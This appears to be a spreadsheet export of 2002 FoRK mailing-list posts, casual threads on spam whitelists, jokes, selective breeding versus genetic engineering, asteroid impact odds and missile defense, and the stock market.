   "You know you have a steering wheel attached to your crotch?"    And the pirate says, "Aaar, its driving me nuts!"
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Turn it off! It not only risks silent false
&gt; positives, but suffers them in such a way that
&gt; individuals cannot adjust/detect/remedy them.Better yet, start another list; fork-spam and forward the suspect items to it.
Much like the noarchive list.  This wouldn't be perfect but it'd be better than
nothing at all.&gt; Usually I figure if I miss a FoRK post,
&gt; no big deal, I'll pick it up by the replies if it's interesting.+1-Bill Kearney
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 23 Jul 2002, Jim Whitehead wrote:&gt; You can download a Pastry simulator off of this web site.Why should I download anything from Microsoft? My firstborn is my and my 
alone. No technology is worth that price. (And since when is Redmond into 
technology? Weather reports from Dis are so far unchanging).http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 07:09, Justin Mason wrote:
&gt; 
&gt; "Gordon Mohr" said:
&gt; 
&gt; &gt; I still think self-add whitelists are underrated. 
&gt; &gt; A FoRK whitelist would presumably start with
&gt; &gt; all subscribers, and grow from there. Bouncing
&gt; &gt; problem mail, in a way that humans can understand
&gt; &gt; how to whitelist themselves for a resend, avoids 
&gt; &gt; the problem of silent failures without opening the 
&gt; &gt; door to lazy, forged-"from" spammers. 
&gt; 
&gt; Big problem I see with this system, is the
&gt; automatically-generated-but-important mails like online tickets,
&gt; bills, etc.Besides lists, this is the reason I can't use such a system. I get more
than a few mails from 'dont-respond-to-this-address@' password reminder
generators, for example. SpamAssassin does flag a few of those as spam,
but at least I've still got them.Luis
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">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touch--not because his hands are so large, but because zee  French woman's 
waist is so slender."
    American says "Yep, but when an American woman gets on a horse, her heels 
reach all the way down to the ground--and it's not because American horses 
are short, but because American women have such endlessly long, sexy legs."
    Russian says: "Da, but when a Russian slaps his wife's ass on his way out 
of the house in the morning, it's still jiggling when he comes back after 
work--and it's not because her ass is so big, but because the Russian work 
day is so short."Tom
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 7/23/2002 8:51:00 PM, joe@barrera.org writes:&gt;Okay, here's a joke I *just* made up while I was driving my car at home:
Joe, I think you need a new car with more leg roomTom
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:&gt;If we're willing to count artificial
&gt;selection as genetic engineering, it's engineering that uses the general mechanism of genetics (inheritance of 
traits) without understanding the specific mechanisms (genes, DNA, etc.). 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:&gt;If we're willing to count artificial
&gt;selection as genetic engineering, Of course was genetic engineering. It used the fundamental mechanism of 
genetics (inheritance of traits), and not randomly, but 
intentionally--breeding for long fur, fat hams, whatever. The degree to which 
the engineers--farmers, breeders--understood exactly how the mehcanism works 
is only marginally relevant to the question of whether it was engineering. 
Science progresses. Over the years, centuries, their, our, knowledge 
increased, and domestication became more effective. Bit by bit the mechanisms 
became known--Mendel making a major breakthrough. The first hybrid grains 
(which date from the 1920s) represent another step. Watson and Crick another, 
etc. But it's engineering--just as Roman architecture was civil engineering, 
even if they knew less about the mathematics behind it than we do today, just 
as Galen was a physician, though laughably ignorant by our standards.TTom
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; it's engineering that uses the general mechanism of genetics (inheritance of 
&gt; traits) without understanding the specific mechanisms (genes, DNA, etc.).
Ah, like the way we used to make babies.  And wine.  And war.Cheers,
WayneAnd anagrams.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:49 AM 7/24/02 +0200, Eugen Leitl wrote:
&gt;On Tue, 23 Jul 2002, Mike Masnick wrote:
&gt;
&gt;&gt; Lately, a fairly large % of the spam I've been getting has been coming
&gt;&gt; from spam systems that forge my own address as the "from" address...
&gt;
&gt;Include a random token with an expiration date with anything you send.  
&gt;Valid whitelisting of From:you@here.net yet invalid random token would get 
&gt;blocked.Adds to the level of annoyance, and makes it even less likely that I'll
ever use it.&gt;&gt; Those spam messages would get through any whitelist I set up
&gt;&gt; (especially since I email stuff to myself all the time).  If
&gt;&gt; whitelists become more popular, I imagine spammers will resort to
&gt;&gt; doing that for the majority of their spams, making whitelists less
&gt;&gt; helpful.
&gt;
&gt;Spammers cannot be bothered to keep track if individual whitelists 
&gt;associated with a given email address.They don't have to.  All they have to do is use some program (which, if
they don't exist already, will certainly be around someday soon) that makes
every spam they send show the recipient as the "from" address as well.&gt;&gt; Plus, I'm still not sure how I feel about whitelists.  I don't think I'm so
&gt;&gt; special that people should need to fill out a special form just to send me
&gt;
&gt;Of course you populate your whitelist with contents of your inbox minus 
&gt;spam, and then add manually stuff from your addressbook.The adding manually thing doesn't seem like much fun.  And, anytime I speak
to someone new, it just makes it more unlikely that they will be willing to
contact me.  Having played around with whitelists in the past, you'd be
amazed at how confused many people get by them as well.  They tend to
ignore the "please apply" messages.As an aside, am I the only person around who simply does not use the
addressbook feature in email programs?  I never have, and I don't see any
reason to.  It (along with not opening attachments) has helped me not to
send out viruses to people.  I generally use my own brain or my inbox as an
addressbook, and search out the last email I received from someone and hit
reply...&gt;&gt; email.  I could see certain friends of mine getting fairly annoyed
&gt;&gt; (especially those with multiple email addresses...).
&gt;
&gt;What's the point of multiple email addresses? They're a pain.Well, yes.  *I* use one email address, but that doesn't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others.Plus, I know plenty of people who change jobs, and suddenly get a new email
address from their new job.  Wouldn't it suck if, in sending out your new
job info, you had to fill out a new application for each friend just to
tell them about your new job email address? -Mike
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Mike Masnick wrote:&gt; Adds to the level of annoyance, and makes it even less likely that I'll
&gt; ever use it.Which annoyance? A string like f70539bb32961f3d7dba42a9c51442c1218a9100
somewhere in the message inserted by the system automatically doesn't 
change anything. Besides, there are simpler solutions:	http://tmda.net/faq.cgi?req=all#4.10
&gt; They don't have to.  All they have to do is use some program (which, if
&gt; they don't exist already, will certainly be around someday soon) that makes
&gt; every spam they send show the recipient as the "from" address as well.See above.
&gt; The adding manually thing doesn't seem like much fun.  And, anytime I speakSo is installing the software. But you do it once.&gt; to someone new, it just makes it more unlikely that they will be willing to
&gt; contact me.  Having played around with whitelists in the past, you'd be	http://tmda.net/faq.cgi?req=all#1.5&gt; amazed at how confused many people get by them as well.  They tend to
&gt; ignore the "please apply" messages.
&gt; 
&gt; As an aside, am I the only person around who simply does not use the
&gt; addressbook feature in email programs?  I never have, and I don't see anyI usually don't use it. Just to lookup addresses/names of people I forget, 
once in a while.&gt; reason to.  It (along with not opening attachments) has helped me not to
&gt; send out viruses to people.  I generally use my own brain or my inbox as anViruses? Other people's problem. Last virus I had was in 1988, or so.&gt; addressbook, and search out the last email I received from someone and hit
&gt; reply...
&gt; 
&gt; &gt;&gt; email.  I could see certain friends of mine getting fairly annoyed
&gt; &gt;&gt; (especially those with multiple email addresses...).
&gt; &gt;
&gt; &gt;What's the point of multiple email addresses? They're a pain.
&gt; 
&gt; Well, yes.  *I* use one email address, but that doesn't mean all my friends
&gt; do.  You would need to convince everyone I know of that.  Most people IMaybe your friends should get used to tagged message delivery, then.&gt; know, at the very least, have a home and work email address.  But plenty
&gt; others have other addresses for various reasons.  Keeping track of all of
&gt; them for a whitelist seems like a pain.  It forces them to remember which
&gt; email addresses are already approved and avoid using others.You have strange friends.
&gt; Plus, I know plenty of people who change jobs, and suddenly get a new email
&gt; address from their new job.  Wouldn't it suck if, in sending out your newWhy should changing my job change my private address? I don't use 
corporate mail for private purposes.&gt; job info, you had to fill out a new application for each friend just to
&gt; tell them about your new job email address?I don't think this is a significant problem in practice.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve"> email.  I could see certain friends of mine getting fairly annoyed
&gt;&gt; (especially those with multiple email addresses...).
&gt;
&gt; What's the point of multiple email addresses? They're a pain.
&gt;
Ah the great spam debate wages on ...So where's Kragen in this whole mess ;-)Eugen, the reason for multiple email addresses (at least _my_ reason) is
that I like to separate my friends from say, FoRK, from say, my school
accounts, from say my spam box.   I tend to get a veritable buttload of
mail from various sources, and sometimes I don't have a chance to go
through it all.   I have it mostly setup on a filter basis (those friends
that go to the carey@ address do get filtered _generally_ speaking into
the friends box, those fork posts, _generally_ go into the FoRK pile. )  
Its still nice to know that if I need to get someone's response and I
haven't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I'll probably change
my mind on the multiple email address thing.   I still like knowing that I
can send the assholes (or undesirable guys I don't feel like dating ;)  to
my @hotmail account.I'm also going to also rescind my prior request not to have a member-only
fork.   As snobby and elitist as a member-only FoRK would be, I'm starting
to feel the pain of the whole spam to bits ratio on fork.   I'd be
willing, multiple email addresses and all, to sign up for a whitelist
provided the system could handle email sent from say cnn.com that was
referenced to my address (say the On Behalf of) emails that a few of us
tend to send.   Does such a system exist?  I'm rather ignorant on the
whole whitelist concept, and I know a few of you are far far more
knowledgable.My half a cent here...: I will be so damn glad when I am done with this whole moving
thing... back on fork when I'm in NH.. :)
Woo hoo!   Law school!)   
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">bitbitch@magnesium.net wrote:&gt;I'm also going to also rescind my prior request not to have a member-only
&gt;fork.   As snobby and elitist as a member-only FoRK would be, I'm starting
&gt;to feel the pain of the whole spam to bits ratio on fork.
&gt;
Here, here... The member-only lists that I'm on have a spam count of 
near zero. An additional benefit is that the list archives aren't full 
of spam either.
E
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">More than a dozen jokes - thanks guys and girls!
(plus some anti-French abuse from the usual suspect).Well my brain doesn't hurt so much any more, and it was well worth it.
I've now got an even faster method for elliptic-curve point counting,
both pratically and asymptotically.It lifts a curve over a field of degree n in time O(n^(2+1/2+eps)),
or O(n^(2+eps)) with precomputation.  Before the best methods took
O(n^(3+eps)) without precomputation, or O(n^(2+1/2+eps)) with it.
The precomputation is done once per field, not per curve, and takes
time O(n^(3+eps)).  Here eps is an arbitrarily small number, hiding
some logarithmic factors.After lifting, you compute a norm in time O(n^(2+1/3+eps)) to get the
number of points on the curve.Here's an example over a 1009-bit field, without precomputation, using
a 1 GHz Pentium III:------------------------------------------------------------------------------
&gt; ./ecpc4 -d 1009 -j 0x123
INFO: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
INFO: -=-=-=-=-= ECPC: Elliptic Curve Point Counting, made easy! =-=-=-=-=-
INFO: -=-=-=-=-= v4.0.0. (c) ArgoTech 2001. All rights reserved. =-=-=-=-=-
INFO: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[...]
INFO: Picked field polynomial 1+x^55+x^1009.
INFO: Starting ECPC on j = 0x123...
INFO: Done after 138.33 seconds.
INFO: Checking... OK OK OK OK OK OK OK OK OK OK
[...]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
INFO: 1 curve processed.
INFO: Bye!
------------------------------------------------------------------------------
L8r,
  Rob.
     .-.                    Robert.Harley@argote.ch                    .-.
    /   \           .-.      Software Development       .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'       ArgoTech      `-'         \   /
             `-'                http://argote.ch/              `-'
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
http://news.bbc.co.uk/2/hi/americas/2147882.stm#table"Around the world, there is a growing sense that democracy has not
delivered development" Sakiko Fukuda-Parr UN report authorHDI rank 2002    LifeEXp InfantMort/1000  GDP$percapita  AdultLit%
1 Norway           78.5      4               29,918       99%*
2 Sweden           79.7      3               24,277       99%*
3 Canada           78.8      6               27,840       99%*
4 Belgium          78.4      6               27,178       99%*
5 Australia        78.9      6               25,693       99%*
6 United States    77        7               34,142       99%*
7 Iceland          79.2      4               29,581       99%*
8 Netherlands      78.1      5               25,657       99%*
9 Japan            81        4               26,755       99%*
10 Finland         77.6      4               24,996       99%*
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; "Around the world, there is a growing sense that democracy has not
&gt; delivered development" Sakiko Fukuda-Parr UN report authorAs opposed to some other form of government which has?- Jim
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">ThosStew@aol.com writes:&gt; In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:
&gt; 
&gt; &gt;If we're willing to count artificial
&gt; &gt;selection as genetic engineering, 
&gt; 
&gt; Of course was genetic engineering. It used the fundamental mechanism of 
&gt; genetics (inheritance of traits), and not randomly, but 
&gt; intentionally--breeding for long fur, fat hams, whatever. The degree to which 
&gt; the engineers--farmers, breeders--understood exactly how the mehcanism works 
&gt; is only marginally relevant to the question of whether it was engineering. Naw, I still disagree, again because if I'm going to be so loose
with the definitions, then I'd have to say that I myself am a
genetically engineered organism.  But I'm natural, baby.  My parents
were attracted to each other's phenotypes, mixed some genes in the
hopes that those genotypes would get in there, and grew me around
them.  Sure, they engineered the process when they selected each
other.  But they didn't engineer the genetics.  If genetic enginering
wasn't such an important topic today, it wouldn't be such an important
distinction.I guess that the reason that I disagree is that some groups arguing
against any checks on genetic engineering use that same argument -
"we've been doing it since prehistory, so we don't need to apply any
caution today".-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry, Karl, your confusing things. Thos is saying that selective 
breeding should be counted as genetic engineering, whereas you are 
extending his definition to include the attration that your parents felt...Unless your parents were selectively bred like livestock to produce you, 
I don't think you can make that case...  :-)Elias
Karl Anderson wrote:&gt;ThosStew@aol.com writes:
&gt;
&gt;&gt;Of course was genetic engineering. It used the fundamental mechanism of 
&gt;&gt;genetics (inheritance of traits), and not randomly, but 
&gt;&gt;intentionally--breeding for long fur, fat hams, whatever. The degree to which 
&gt;&gt;the engineers--farmers, breeders--understood exactly how the mehcanism works 
&gt;&gt;is only marginally relevant to the question of whether it was engineering. 
&gt;&gt;    
&gt;&gt;
&gt;
&gt;Naw, I still disagree, again because if I'm going to be so loose
&gt;with the definitions, then I'd have to say that I myself am a
&gt;genetically engineered organism.
&gt;
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 14:45, Jim Whitehead wrote:
&gt; &gt; "Around the world, there is a growing sense that democracy has not
&gt; &gt; delivered development" Sakiko Fukuda-Parr UN report author
&gt; 
&gt; As opposed to some other form of government which has?The report, apparently, makes that point as well. Tom seems to have
taken things a slight bit out of context. :)Luis (busily planning his trip to #172)
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Elias Sinderson  writes:&gt; Sorry, Karl, your confusing things.No, it's just a silly discussion, but that's what picky semantic
discussions turn into :)&gt; Thos is saying that selective 
&gt; breeding should be counted as genetic engineering, whereas you are 
&gt; extending his definition to include the attration that your parents felt...Yes, I'm saying that if he extends "genetic engineering" to include
selecting animals to breed, he must extend it to include selecting
people to breed with.&gt; Unless your parents were selectively bred like livestock to produce you, 
&gt; I don't think you can make that case...  :-)I'm saying that my parents selected each other, and that they did so
because (among other reasons) each wanted the other's genes to be
mixed with their own in the offspring that they were planning.What does it matter that they were selecting to produce their own
offspring, rather than the offspring of two unrelated animals?-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley  writes:    R&gt;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HA!  Ha ha ha! ha, ha ha, a-hee, hee. aHEM! whew. (sigh)Good one. ok, Robert, you win :)-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Elias Sinderson wrote:--]Sorry, Karl, your confusing things. Thos is saying that selective
--]breeding should be counted as genetic engineering, whereas you are
--]extending his definition to include the attration that your parents felt...The grain is this.......Selective breeding, cross polinization, ie  is a MACROgenetic activites.
Your dealing with big structures like whole sheep, plants, seed etc.Manipulating the actual DNA, protein sequences, etc etc is a MICROgenetic
activity.MACROgenetic activites have decades on decades of testing...
MICROgentic  activities DO NOT.
You guys get the point yet, or do you want to play another round of
Obscura Detalist Retardo?-tom
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 24 Jul 2002, Luis Villa wrote:--]The report, apparently, makes that point as well. Tom seems to have
--]taken things a slight bit out of context. :)I was simply posting, I did nto even comment of the fsking thing. So back
the F off biotches.Jezz, add too much and they jump on you , dont add anything but your name
and they fill in thier own versions....Two fingers in the air.I LOVE YOU ALL.-tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom  writes:&gt; MACROgenetic activites have decades on decades of testing...
&gt; MICROgentic  activities DO NOT.An interesting idea I heard of was to use gene maps &amp; genetic info
about animals to guide the breeding process - essentially shortening
the iteration time with genetic information, but not touching any
genes themselves.-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 24 Jul 2002, Karl Anderson wrote:--]An interesting idea I heard of was to use gene maps &amp; genetic info
--]about animals to guide the breeding process - essentially shortening
--]the iteration time with genetic information, but not touching any
--]genes themselves.Thats where the gentic Purists bredding program was heading. Hitler wet
himslef when his big brains laid out the plan of forced natural selection,
images of strong young blonde boys marching around him sent him off in a
double nostil coke blow frenzy..Of course back then they did not have the fine tuned maps we got today.
Macromap wise we got the host of gps angles over head beaming the answeres
in  feet to our "where are we now" musings, micromap wise we now have the
ability to spot the "will laugh at the goon shows" switch"All the early genticpurists had to go on was hkull size, hair color and
schlongalongadingdangage.AS always the probelm is not that we can do this , its what we do with it.-tomwsmfhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">My take: if genetic engineering includes selective breeding, then it
also includes human pairs that are not randomly grouped.It doesn't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+ 40K) you have one pair with $200
and one pair with $80 and this has some interesting social effects.  And
one of those effects is the difference in their children (on average).
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Karl
&gt; Anderson
&gt; Sent: Wednesday, July 24, 2002 1:15 PM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: [Baseline] Raising chickens the high-tech way
&gt; 
&gt; Elias Sinderson  writes:
&gt; 
&gt; &gt; Sorry, Karl, your confusing things.
&gt; 
&gt; No, it's just a silly discussion, but that's what picky semantic
&gt; discussions turn into :)
&gt; 
&gt; &gt; Thos is saying that selective
&gt; &gt; breeding should be counted as genetic engineering, whereas you are
&gt; &gt; extending his definition to include the attration that your parents
&gt; felt...
&gt; 
&gt; Yes, I'm saying that if he extends "genetic engineering" to include
&gt; selecting animals to breed, he must extend it to include selecting
&gt; people to breed with.
&gt; 
&gt;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&gt; 
&gt; --
&gt; Karl Anderson      kra@monkey.org
http://www.monkey.org/~kra/
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Instead of spreading BBC FUD, it's best to go straight to the horse's
mouth: http://neo.jpl.nasa.gov/risk/2002nt7.htmlThat said, if you do a comparison with the Google cache page, you'll
see that the probability of impact has increased significantly given
the last three days worth of observations.Hit or miss, Groundhog Day 2019 is going to be one heck of a show.
Book early, avoid the rush.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall spake thusly:
&gt;It has been brought up that a boss no longer marries his secretary.Wot, is she not cute???
Re: Asteroids anyone ?Not another one.
Hmm... the NASA page gives Impact Probability = 3.9e-06.
One in 250000.
What, me worry?
L8r,
  R
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
&gt; Hit or miss, Groundhog Day 2019 is going to be one heck of a show. Book
&gt; early, avoid the rush.Hey, meybee by then, Bush's grand plan for a missle defense system will
actually pan out and -work- ...
I'm not holding my breath, but i'm not going to panic for something thats
a little under 17 years away, either.
-c&gt;
&gt; --
&gt; Gary Lawrence Murphy  TeleDynamics Communications
&gt; Inc Business Innovations Through Open Source Systems:
&gt; http://www.teledyn.com "Computers are useless.  They can only give you
&gt; answers."(Pablo Picasso)
&gt;
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 16:46,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I don't think a ballistic missile defense system will be much help
against a rock a couple thousand kilometers in diameter.  That's WAY
outside the design spec for any such system.  Particularly when
ballistic intercept designs usually don't have any type of warhead
associated with them, either being kinetic or directed energy weapons.Contrary to popular belief, ballistic missile defense isn't a hard
problem (ignoring whether or not it is useful).  The only real challenge
is materials science, as it really pushes the envelope of materials
performance requirements to places they've never been; there has been
some technology crossover with some of the new materials and processes
they've had to come up with.  The actual discrimination algorithms,
while way more advanced than anything you'll see in the private sector
(and classified, to keep it that way), are usually run on a crusty old
MIPS R3k embedded processor or similar, with a low-to-mid range DSP to
help out. It is not computationally intensive by any means.I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conclusive.In summary:1) Ballistic missile intercept technology is useless on a big rock.  You
are much better off using heavy-lift space technology to deliver a big
nuke (or small nuke, depending on your plan). 2) State-of-the-art ballistic missile intercept technology is far more
competent than most people imagine it is, and has discrimination
capabilities that exceed most popular belief.  It better be -- they've
had twenty years to work on it.3) I've never heard a really convincing argument against deploying
ballistic missile intercept technology, particularly considering most of
the R&amp;D investment has already been made. I don't really care about it
one way or the other, but I also don't see why other people have fits
over it either.Cheers,-James Rogers
 jamesr@best.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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animals?That doesn't matter.  What does matter
is that they were going on phenotypes,
and didn't engineer the genetics.  That
example makes a good case for natural
selection, but not for artificial.(do "married people live longer" because
of the benefits of matrimony, or because
acceptable health is one of the qualities
selected for in spouses?)Of course, if there are FoRKs with six
or fewer biological great grandparents
(or who are offspring of Wilt) I should
eat my words; otherwise, the micro/macro
distinction seems much more relevant.-Dave&gt; I guess that the reason that I disagree is that some groups arguing
&gt; against any checks on genetic engineering use that same argument -
&gt; "we've been doing it since prehistory, so we don't need to apply any
&gt; caution today".One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http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 18:14, James Rogers wrote:
&gt; I don't think a ballistic missile defense system will be much help
&gt; against a rock a couple thousand kilometers in diameter.
Errrr... Or a couple thousand *meters* in diameter either.-James Rogers
 jamesr@best.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">James Rogers wrote:
&gt;I don't think a ballistic missile defense system will be much help
&gt;against a rock a couple thousand kilometers in diameter.That would destroy Earth completely!  The one in question is 2.06 km
(1.28 miles) in diameter.R
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">With enough warning, you might not even care about trying to divert 
the meteor -- you'd divert the Earth instead.I recall reading many years ago about calculations, done separately
both by US and USSR scientists for different reasons, about the
effect of nuclear explosions on the moon's mass, and thus its orbit,
and thus also (over time) the Earth's path around the sun.I believe the conclusion was that mild changes in the moon's 
composition would have the effect, over several years, of changing 
significantly where the Earth would be at any certain future point. Voila! No collision -- at least not with the initial threat. And
no need to travel out to anywhere near the meteor, either. Just
the moon.- Gordon
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Gordon Mohr  writes:    G&gt; Voila! No collision -- at least not with the initial
    G&gt; threat. And no need to travel out to anywhere near the meteor,
    G&gt; either. Just the moon.Yeah, right.  Considering the Genesis project just won an award for
figuring out (surprise, surprise) that N-body problems with 10+ bodies
yield some interesting synergetic surprises ...  suffice it to say
that the issue has been hashed over in sci.astro many, many times,
since even long before Hollywood posed the problem, and the very best
advice is still "duck and cover"; if you are still going to nudge
anything, though, I'd nudge the rock (the one the size of a small
town) as you're less likely to re-define global agriculture that way.'Course, you're gonna have this problem of distributing the force over
a large enough surface area that it translates into a resillient
compression wave instead of a knifeblade/diamond faultline split.
It's also not a game of billiards, but a 6+ dimensional collision
problem (space, time, spin, temp, maybe electromag too if there's any
heavy metals in it, and there often is) complete with relativistic
effects and everything. Hands up all those with experience subjecting
blackboxed alien geology to sustained forces in excess of 100 megatons
(10% of it's own momentum).  I'm going to trust the US Army with this
when they can't even /find/ more than a few hundred Al Queda in a
desert? Oh, another problem: It's not the only rock out there.  We're just
getting better at spotting them.Tell ya what: when you cowboys do get ready to bally-hootin' out to
blow-er-up-real-good, you let me know, eh, so I can move the the next
solar system before you do.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
http://www.cnn.com/2002/US/07/23/binladen.internet/index.html    ... CNN reported earlier this year that al Qaeda has used at least one
    Web site to post information and keeps changing the site's address to
    stay ahead of investigators.    Authorities also are investigating information from detainees that
    suggests al Qaeda members -- and possibly even bin Laden -- are hiding
    messages inside photographic files on pornographic Web sites.Any wagers that this heralds the appearance of a bill to ban and/or
harrass any sites which may be host to suspected-AlQaeda messages?And what about Emenem records played backwards?-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">In a message dated Wed, 24 Jul 2002 1:51:48 PM Eastern Standard Time, kra@monkey.org writes:&gt;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prove.geege
&gt; -- 
&gt; Karl Anderson      kra@monkey.org           
&gt; http://www.monkey.org/~kra/
&gt; http://xent.com/mailman/listinfo/fork 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002 bitbitch@magnesium.net wrote:&gt; Hey, meybee by then, Bush's grand plan for a missle defense system will
&gt; actually pan out and -work- ...Hey, that thing is 2 km across and 28 km/s fast. There's nothing you can
do just before the impact with a system that was designed to deal with
tiny ballistic missiles, and largely by damaging them, not destroying
them. Apart from twiddling with the surface albedo which might be not
enough -- we currently don't have ion drives with enough power, or at
least we can't develop and deploy them on time, so that only leaves you
with nukes. Assymetrical repeated flash-evaporation (anything closer would
risk fragmenting it) on rocks of unknown composition (could be a pile of
rubble for all what we know) has never been tried yet, though.&gt; I'm not holding my breath, but i'm not going to panic for something thats
&gt; a little under 17 years away, either.It is much more interesting whether you can kill enough of delta v for a 
capture. But here trying to brake a smaller object (say, few 100 m across) 
with final stage aerobraking would be far more useful. Otoh, one could as 
well could invest that effort into a launch capacity on the Moon.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1A bull market climbs a wall of worry -- on record volume.Yeah, I know, it's different this time. Pay no attention to the bear
behind the curtain, and all that.However, at the end of the *last* bear market, in 1983 -- yup, that
long ago -- Granville sell-orders caused bloodbaths with boring
regularity, a stockholm-syndrome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2 point something
*billion* shares).. Back then, I was a mail-cart-pushing,
key-punching "administration" clerk at Morgan Stanley in Chicago,
chief scrounge for a bunch of Masters of the Universe, and everybody
at Morgan thought the resulting price-pop was just a technical rally
and wouldn't last either. :-). Six months later, people *still* said
it wouldn't last, and a girlfriend's uncle was saying that it was too
late, he'd missed the train, so he was going to stay out 'till the
market came back down a bit. By that time, the Dow was at, what,
1600? I wonder if he's still out, waiting...
A 40% decline is a big chunk of change, boys and girls, even if it's
40% of a bubble. Actually, by my count, it's 100% of the bubble, but
that's just me. After all, Amazon and EBay's P/Es still need a
pressurized cabin to breathe in.So, yes, the market may go lower, but not much more, relatively
speaking. At some point, and fairly soon, I bet, someone's going to
realize that, even though you wouldn't want to actually trade one for
a house, tulips are still nice things to have around.Hint: Interest rates are rediculuously low, they aren't going up any
time soon, and, if we can survive the election, the recently-started
CEO witch-hunt won't be too much more than Street theater, probably
not resulting in much in the way of regulation or legislation. The
threat of which, frankly, probably caused this recent explosive
decompression in the first place. Your tax dollars at work, if you
will.So, in light of the erstwhile bloodbath on Capital Hill, and the real
one we just saw a few days ago in the market, it may be time for
people to remember what Mr. Rothschild said, and buy now while
there's blood in the streets.As to whether the accounting is "rigged", remember what Robert
Heinlein said: "Who cares if the game is rigged? You can't win if you
don't play."Cheers,
RAH
The aforementioned girlfriend, by the way, traded *me* in for an
actual Rothschild in 1984, after I insisted on going back to school
and talking my way into the back door at the University of Chicago to
boot. The cost of anything being the foregone alternative, it
sometimes seems to me I'm *still* paying for that detour, but that's
a bear of a different color, and it's okay as long as I don't look
